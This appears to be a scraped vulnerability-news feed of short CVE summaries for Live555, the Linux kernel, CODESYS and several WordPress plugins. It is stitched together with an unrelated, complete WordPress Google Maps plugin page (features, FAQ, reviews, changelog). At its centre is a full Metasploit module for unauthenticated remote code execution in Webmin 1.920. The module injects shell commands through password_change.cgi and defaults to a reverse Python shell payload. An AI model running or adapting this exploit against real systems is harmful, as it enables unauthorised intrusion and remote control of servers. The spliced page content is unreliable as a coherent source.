Live555 before 2019.08.16 has a Use-After-Free because GenericMediaServer::createNewClientSessionWithId can generate the same client session ID in succession, which is mishandled by the MPEG1or2 and Matroska file demultiplexors.

CVE-2019-15232

An issue was discovered in the Linux kernel before 5.2.8. There is a NULL pointer dereference caused by a malicious USB device in the sound/usb/helper.c (motu_microbookii) driver.

CVE-2019-15222

An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.

**Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)**

**Platform:****Linux**

**Date:****2019-08-12**

 

 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 
 include Msf::Exploit::Remote::HttpClient
 
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Webmin 1.920 Unauthenticated RCE',
 'Description' => %q{
 This module exploits a backdoor in Webmin versions 1.890 through 1.920.
 Only the SourceForge downloads were backdoored, but they are listed as
 official downloads on the project's site.
 
 Unknown attacker(s) inserted Perl qx statements into the build server's
 source code on two separate occasions: once in April 2018, introducing
 the backdoor in the 1.890 release, and in July 2018, reintroducing the
 backdoor in releases 1.900 through 1.920.
 
 Only version 1.890 is exploitable in the default install. Later affected
 versions require the expired password changing feature to be enabled.
 },
 'Author' => [
 'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
 ],
 'License' => MSF_LICENSE,
 'References' =>
 [
 ['CVE', '2019-'],
 ['URL', 'https://www.pentest.com.tr']
 ],
 'Privileged' => true,
 'Payload' =>
 {
 'DisableNops' => true,
 'Space' => 512,
 'Compat' =>
 {
 'PayloadType' => 'cmd'
 }
 },
 'DefaultOptions' =>
 {
 'RPORT' => 10000,
 'SSL' => false,
 'PAYLOAD' => 'cmd/unix/reverse_python'
 },
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
 'Targets' => [['Webmin <= 1.910', {}]],
 'DisclosureDate' => 'May 16 2019',
 'DefaultTarget' => 0)
 )
 register_options [
 OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
 ]
 end
 
 def peer
 "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
 end
 ##
 # Target and input verification
 ##
 def check
 # check passwd change priv
 res = send_request_cgi({
 'uri' => normalize_uri(target_uri.path, "password_change.cgi"),
 'headers' =>
 {
 'Referer' => "#{peer}/session_login.cgi"
 },
 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1"
 })
 
 if res && res.code == 200 && res.body =~ /Failed/
 res = send_request_cgi(
 {
 'method' => 'POST',
 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
 'ctype' => 'application/x-www-form-urlencoded',
 'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
 'headers' =>
 {
 'Referer' => "#{peer}/session_login.cgi"
 },
 'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss" 
 })
 
 if res && res.code == 200 && res.body =~ /password_change.cgi/
 return CheckCode::Vulnerable
 else
 return CheckCode::Safe
 end
 else
 return CheckCode::Safe
 end
 end
 
 ##
 # Exploiting phase
 ##
 def exploit
 
 unless Exploit::CheckCode::Vulnerable == check
 fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
 end
 
 command = payload.encoded
 print_status("Attempting to execute the payload...")
 handler
 res = send_request_cgi(
 {
 'method' => 'POST',
 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
 'ctype' => 'application/x-www-form-urlencoded',
 'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
 'headers' =>
 {
 'Referer' => "#{peer}/session_login.cgi"
 },
 'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
 })
 
 end
 end

CVE-2019-15107: Offensive Security’s Exploit Database Archive

An issue was discovered in 3S-Smart CODESYS V3 products. The application may utilize non-TLS based encryption, which results in user credentials being insufficiently protected during transport. All variants of the following CODESYS V3 products in all versions containing the CmpUserMgr component are affected regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (also part of the CODESYS Development System setup), CODESYS V3 Simulation Runtime (part of the CODESYS Development System), CODESYS Control V3 Runtime System Toolkit, CODESYS HMI V3.

CVE-2019-9013

The events-manager plugin before 5.6 for WordPress has code injection.

CVE-2015-9298: Events Manager

The ultimate-member plugin before 1.3.18 for WordPress has XSS via text input.

CVE-2015-9304: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

The wp-ultimate-csv-importer plugin before 3.8.1 for WordPress has XSS.

CVE-2015-9306: Import All Pages, Post types, Products, Orders, and Users as XML & CSV

The wp-google-map-plugin plugin before 3.1.2 for WordPress has XSS.

* Details
* Reviews
* Installation
* Development

The most advanced yet easy to use Google maps plugin for WordPress. Create beautifully styled, modern & responsive google maps with multiple locations, custom marker icons, marker categories, custom infowindow messages, images and more. Enable marker category filter on frontend to allow users to filter the locations.

> 👉 Create multiple google maps with different marker icons, marker categories and locations assigned to them. 
> 👉 All of the best web practices applied to make google maps load faster.

With just few clicks, you will be able to add beautifully designed custom google maps to any page / post or widget with help of generated shortcode.

Contact Dedicated Support team for setup configurations needs or for any other assistance.

Google autosuggest enabled location form helps you as site administrator to create unlimited markers and then assign these markers to a google map. It’s super easy.

> Here is a quick highlight on the numerous customizable features offered by the free and pro versions of the **WP MAPS PRO Version**.

**Lite Version (Free)**

> ➡️ Create multiple google maps with different marker icons, marker categories and locations assigned to them. 
> ➡️ Add unlimited locations with various information. 
> ➡️ Assign multiple locations to a single google maps. 
> ➡️ Display a info window message to any location. 
> ➡️ Maps Marker Infowindow Open On: Mouse Click or Mouse Hover. 
> ➡️ Display Google Maps on posts/pages using shortcode. 
> ➡️ Centering the map according to assigned locations. 
> ➡️ Decide center latitude and longitude for each map separtely. 
> ➡️ Easy way to assign category to any location. 
> ➡️ Select your marker icon for markers. 
> ➡️ Enable marker cluster functionality for markers. 
> ➡️ Easily edit or delete google map functionality. 
> ➡️ Assign your own markers to categories or choose colorful markers from +500 readymade markers provided by the Maps Icons Collection. 
> ➡️ Select among 4 map type : Roadmap,Satellite,Hybrid,Terrain 
> ➡️ Set your map height and width. 
> ➡️ Set Google maps zoom level. 
> ➡️ Google Maps can be Draggable 
> ➡️ Display traffic real time conditions and overlays using Layers. 
> ➡️ Add bicycle path information to your maps using the Bicycling Layer. 
> ➡️ Enable Google Map Transit layer 
> ➡️ Marker Animation on Click or Mouse hover the marker. 
> ➡️ 45° imagery functionality 
> ➡️ Add circle in your Maps plugin 
> ➡️ Create a Google maps just in seconds. 
> ➡️ Street view supported 
> ➡️ widget supportive : Display Google Maps on sidebars using widget. 
> ➡️ Pov Heading and Pov Pitch for street view. 
> ➡️ Fully Responsive.Display your map perfectly on all devices. 
> ➡️ Create 100% responsive maps effortlessly.Tested on real devices. 
> ➡️ A Cross Browser Compatible plugin. Fully tested on IE8, IE9, IE10 and all major browsers 
> ➡️ Multi-lingual Supported. 
> ➡️ Multisite Enabled and ability to activate it network wide. 
> ➡️ Map Stylization : Customizable Google maps style from https://snazzymaps.com. 
> ➡️ Search control on frontend map to search location easily. 
> ➡️ Filter markers by category. 
> ➡️ No content / data loss when migrating from free version to pro version.

**Additional Features Available In Pro**

WP MAPS PRO

Pro version plugin contains all the features of free version plugin plus some additional features which are listed below

> 👉 Listing : Display listing in grid or list style under map. Fully responsive listing. 
> 👉 Map Layers : Display Traffic Layer , Bicycling Layer, Transit layer 
> 👉 Import/Export Locations : Import Export Locations supported using CSV.Sample csv is attached in pro version. 
> 👉 Draw shapes : rectangle, circle, polygon and polyline. 
> 👉 Display unlimited shapes. Display Message on shape click or Redirect to external link. 
> 👉 Direction & Route : Directions & Route Suggestion. Display directions results in KM and MILES. 
> 👉 Sort listing by location, category and address alphabetically in location listing. 
> 👉 Marker Category : Assign multiple categories to a location. 
> 👉 Infowindow Contents: Customize infowindow contents with help of Placeholders. 
> 👉 Display Posts Information, custom fields, taxonomies and featured images on infowindow message using placeholders. 
> 👉 Unlimited number of map markers and locations. 
> 👉 Set your own google map marker icon 
> 👉 Drag and drop feature for markers, custom animation support 
> 👉 Allows to display the user location on map. 
> 👉 Nearby locations based on user’s current location. 
> 👉 Display Posts/Pages or Custom Post Types on google maps using **custom fields**. 
> 👉 Center the map based on visitor’s current location. 
> 👉 Define overlays on Google maps via an easy to use interface. 
> 👉 Integrate GEOJSON in to google maps. 
> 👉 Display multiple Kml/Kmz Layer on the map. 
> 👉 Fusion Table Layers. 
> 👉 Add Geo location 
> 👉 Add any number of Google maps on pages/posts/sidebars. 
> 👉 Allows to insert the map as widget on sidebars. 
> 👉 Add unlimited locations using an easy to use interface for Google Maps. 
> 👉 Display location title, location category, location latitude, location longitude with location message in the infowindow. 
> 👉 Create unlimited maps and display on posts/pages using shortcode or in sidebar using widget. 
> 👉 Design your own Google map skins easily. Turn ON/OFF roads, places, water area. 
> 👉 Ability to display infowindow on mouse click on mouse hover. 
> 👉 Display your map perfectly on all devices. Create 100% responsive maps effortlessly. 
> 👉 Multi-lingual Supported. 
> 👉 Display physical maps based on terrain information. 
> 👉 Display Google Earth satellite images on just one click. 
> 👉 Display maps in a blend of normal and satellite views. 
> 👉 Setup POV Heading and POV Pitch of Street View to customize Street View output of a location. 
> 👉 Full support of controls of the Google map, such as zoom control, map type control, scale control, street view control, fullscreen and rotate control 
> 👉 Drag and drop feature for markers, custom animation support 
> 👉 Modify Locating Listing using Placeholder. 
> 👉 Hooks Supported – Use actions & filters to modify map,markers,listing and associated html on fly. 
> 👉 Display locations listing with filters & pagination. Fully customizable using backend settings and hooks. 
> 👉 Use “wpgmp\_geo\_tags\_args”, “wpgmp\_geo\_featured\_image”, “wpgmp\_geotags\_placeholder”, “wpgmp\_geotags\_content” hooks to extend Posts on google maps functionality as you want. 
> 👉 Use External Database or Sources to add markers on google maps using new filter wpgmp\_marker\_source. 
> 👉 Load markers from external database or API sources with help of filters (Hooks). 
> 👉 A Cross Browser Compatible plugin. Fully tested on IE8, IE9, IE10 and all major browsers 
> 👉 Multisite Enabled and ability to activate it network wide. 
> 👉 Visit our Pro Edition WP MAPS PRO 
> 👉 Fully extensible & scalable plugin to make it ready for customisations according to website / business requirements.

**Live Examples**

* WP MAPS PRO LIVE DEMOS

**Links**

Upgrade to Pro | 
Live Examples | 
Developed by flippercode

This section describes how to install the plugin and get it working.

 1. Upload the wp-google-map-plugin directory to the /wp-content/plugins/ folder
 
 2. Once the plugin is uploaded log into WordPress and go to Plugins
 
 3. Find the wp-google-map-pluginplugin and click Activate Plugin
 
 =How to work=
 
 1. Go to settings page of plugin and insert your google maps api key. see full instruction [How to create Api key](https://www.wpmapspro.com/docs/how-to-create-an-api-key/)
 
 2. First create your locations using 'Add Location' page.
 
 3. Then create your first map using 'Add Map' page and assign your locations.
 
 4. Each map is assoicated to a shortcode. You can view shortcode on 'Manage Maps' and copy and paste it on your pages or posts. You can display your google maps in the sidebar using widget. 
 

**Documentation**

* Get Started

**Can I create a custom marker ?**

Yes, you can upload your own marker image or you can choose from readymade icons.

**Do I need to calculate latitude & longitude myself ?**

No, Address field is google autosuggest enabled so you just start typing and choose your address. Latitude & Longitude will be calculated automatically.

**How many locations I can assign to the map?**

You can assign as many as location you want to display on google maps.

**How to display map on page?**

Go to ‘Manage Maps’ and copy the shortcode for your map. Each map will have own shortcode. You just paste that on your page.

**Can I display map using widget?**

Yes, First create your map and then you can display your map in sidebar from widget section.

**How to register google maps api key?**

Go to \[Google Maps API console\] 
(https://console.developers.google.com/flows/enableapi?apiid=maps\_backend,geocoding\_backend,directions\_backend,distance\_matrix\_backend,elevation\_backend,places\_backend&keyType=CLIENT\_SIDE&reusekey=true&pli=1) 
and you can create your google maps api key here.

We have a guide \[Important Changes in Google Maps\] 
(https://console.developers.google.com/flows/enableapi?apiid=maps\_backend,geocoding\_backend,directions\_backend,distance\_matrix\_backend,elevation\_backend,places\_backend&keyType=CLIENT\_SIDE&reusekey=true)

**How to upgrade to pro version?**

You can purchase WP MAPS PRO and then just keep your lite version deactivated and then activate the pro version. You’ll not loss any of your data. Your all data will be migrated to pro version automatically.

**Do we have Live Demo?**

Yes, You can click on WP MAPS PRO LIVE DEMOS and mail us at hello at flippercode dot com if any pre-purchase query.

**Do we have a Documentation?**

Yes, You can click on WP MAPS PRO TUTORIALS and you will get all documentation with proper steps and video tutorials.

**Do we have offer refund?**

Yes, You can get refund any time if pro version is not suitable for you.

**Do we have offer customization?**

Yes, You can mail us your requirement at hello at flippercode dot com.

Been looking for a free plugin where you can customize the map and add your own marker for a while. This plugin does all that and the support is really good.

Active support, reacts fast to fix the problem, which is good. Makes this plugin a good choice, actively maintained.

WP MAPS had a display bug on my website. Flippercode support intervened very quickly, and was able to solve the problem in less than 24 hours, thank you very much!

My all time favourite maps plugin! Good Work!

Quick fix with a bug on lower versions of PHP

Read all 112 reviews

“WordPress Plugin for Google Maps – WP MAPS” is open source software. The following people have contributed to this plugin.

Contributors

* Flipper Code

**4.4.2**

* Fix : Callback function required error notice by google fixed.

**4.4.1**

* Fix : Warnings and notices related to infowindow fixed.

**4.4.0**

* Fix : Security issuse related to \[display\_map\] shortcode fixed.

**4.3.9**

* New : Centering the map according to assigned locations.

**4.3.8**

* New : Multiple design templates added for marker infowindow.
* New : Upload custom image for each location and display it inside infowindow with help of new placeholder.

**4.3.7**

* Fix : Category filter issue fixed.
* New : Marker cluster functionality added.

**4.3.6**

* Fix : The delete pop-up is displayed now.

**4.3.5**

* Fix : Plugin code optimised.

**4.3.4**

* New : Snazzy Maps settings readded.

**4.3.3**

* New : Compatibility Issue with PHP 7.2 Resolved

**4.3.2**

* New : Plugin name updated according to released guidelines.

**4.3.1**

* New : Code Improvements.

**4.3.0**

* New : Link for API key generation process through wizard updated.

**4.2.9**

* New : Google Maps API key link updated on add map and add location page.

**4.2.8**

* New : How to use page updated with new google maps console link.

**4.2.7**

* Fix : Broken link fixed.

**4.2.6**

* New : Displayed dynamic google map API key HTTP referrer in the backend, which will be needed in API key creation process.
* New : Added review collection notice for the plugin.

**4.2.5**

* Fix : Infowindow HTML tags were stripping while updating the map.

**4.2.4**

* Fix : Confirmation popup added on bulk delete action for category,location and map.
* Fix : Security issue fixed for delete and copy map operation.

**4.2.3**

* Fix : ‘Select Category’ text displayed in marker category filter dropdown is now translatable.
* Fix : Fixed a logical validation issue on Add location form in back-end.

**4.2.2**

* Fix : UI issues of map controls caused by currently activated theme fixed.

**4.2.1**

* Fix : Warnings removed from frontend when map is deleted from backend.

**4.2.0**

* New : Confirmation boxes added before deleting locations / marker categories / maps.
* New : Addons introduction page updated.

**4.1.9**

* Fix : One warning and one notice fixed on add map page, code optimised.

**4.1.8**

* New : Dismissable notice to buy premium version plugin added.

**4.1.7**

* New : Better UI interface for backend forms.

**4.1.6**

* Fix: Calling files remotely fixed. Removed shorthand URLs. Text domain corrected. WordPress tested upto version number updated. Data sanitisation & escaping work done. Unused code removed. Design issue fixed on manage location and manage maps page. New filter added.

**4.1.5**

* Fix: SQL vulnerability issue fixed.

**4.1.4**

* Fix: SQL security issue fixed.

**4.1.3**

* New: New hooks added before and after map rendering.
* New: Extentions related information provided.

**4.1.2**

* Fix: Missing translation files added.

**4.1.1**

* New: Search control on map for easy location searching.
* New: Filter markers by category.

**4.1.0**

* Fix: Removed reported vulnerability. Updated code in data save modules and applied more security.
* New: Display google maps in different beautiful skins. Snazzy maps support integrated.

**4.0.9**

* Fix: Removed PHP Warnings and coding standard updated.

**4.0.8**

* Fix: Broken link fixed.

**4.0.7**

* Fix: Optimized CSS and removed unused CSS, Files and Code.

**4.0.6**

* Fix: Optimized CSS and removed unused CSS, Files and Code.

**4.0.3**

* Fix: Removed unused file.

**4.0.2**

* Fix: call\_user\_func\_array is resolved.

**4.0.1**

* Fix: Blank Page on Add Map is fixed.

**4.0.0**

* Improvement: New UI for Backend Pages and Forms.
* New: Ability to customize info window message using placeholder.
* New: Ability to show info window on click or mouseover.
* New: Set default marker icon for the map.

**3.2.0**

* Security Fix: Security vulnerablity is resolved.

**3.1.6**

* Improvement Fix: How to use plugin instruction added.

**3.1.5**

* Improvement Fix: CSS fixed for wordpress 4.6.

**3.1.4**

* Improvement Fix: Missing google maps api key notification added on location page.

**3.1.3**

* Fix: Indexed Warning is resolved in class.initial-core.php.

**3.1.2**

* Fix: XSS Vulnerability is resolved.

**3.1.1**

* Fix – Access level to WP\_List\_Table\_Helper::pagination() must be public.

**3.1.0**

* New – resize\_map() function is added to correct the grey map in tabs issue.
* Improvement – Remove directory reading functions.

**3.0.9**

* Multi-site bug resolved.

**3.0.5**

* Lang slug changed to wp-google-map-plugin as per wordpress.org requested.

**3.0.4**

* links in the info window is broken due to missing stripslashes function – resolved.

**3.0.3**

* wpgmp\_admin\_overview capability added to read how to use instructions.

**3.0.2**

* echo $before\_widget and $after\_widget added for correct widget output.

**3.0.1**

* Category icon broken issue resolved.
* Markers are not displaying on the map, issue resolved.
* Infowindow Message is not showing on marker click, issue resolved.

**3.0.0**

* Sanitize all inputs and outputs.
* New file & folder structure.
* Object oriented based coding according to wordpress standard coding rules.
* Clean bootstrap based design.
* Ability to show any number of google maps on a single map.
* Decide center latitude and longitude for each map.
* POV Heading and Pov Pitch for street view.
* Sub categories supported.
* Redirect to URL on marker click.
* City, State, Country and Postal code new fields in location form.
* Apply marker animation.
* Position google maps controls e.g Pan,Zoom,May Type with easy to use interface.

**2.3.10**

* CSRF Protection added on add/edit location.
* CSRF Protection added on add/edit map.
* CSRF Protection added on add/edit category.

**2.3.9**

* Display more than 10 locations on Manage Locations using Screen Options.
* Display more than 10 maps on Manage Categories using Screen Options.
* Display more than 10 categories on Manage Maps using Screen Options.
* SSL Supported.

**2.3.8**

* locations, maps and category was not showing on manage pages in wordpress 4.2 resolved.

**2.3.7**

* Improvement Fix: Fixed add\_query\_arg() and remove\_query\_arg() usage to avoid XSS Vulnerability.

**2.2.0**

* Twitter Bootstrap 3 Based.
* Solved Featured Image Problem.

**2.1.0**

* Infowindow CSS Improved.
* Optimized Code for Fast Map Experience.
* Solved Layer Display Problem.

**1.2.0**

* Zero Configuration Enabled.
* Managed Navigation.
* Custom Icon using Widget.

**1.1.0**

* Solved zoom toolbar bug.
* Solved white lines on the map.
* Added Widget Support.
* Added multiple maps on a page support.

CVE-2016-10878: WordPress Plugin for Google Maps – WP MAPS

The FV Flowplayer Video Player plugin before 7.3.14.727 for WordPress allows email subscription XSS.

CVE-2019-14799: FV Flowplayer Video Player

The Tribulant Newsletters plugin before 4.6.19 for WordPress allows XSS via the wp-admin/admin-ajax.php?action=newsletters_load_new_editor contentarea parameter.

Tag

#ssl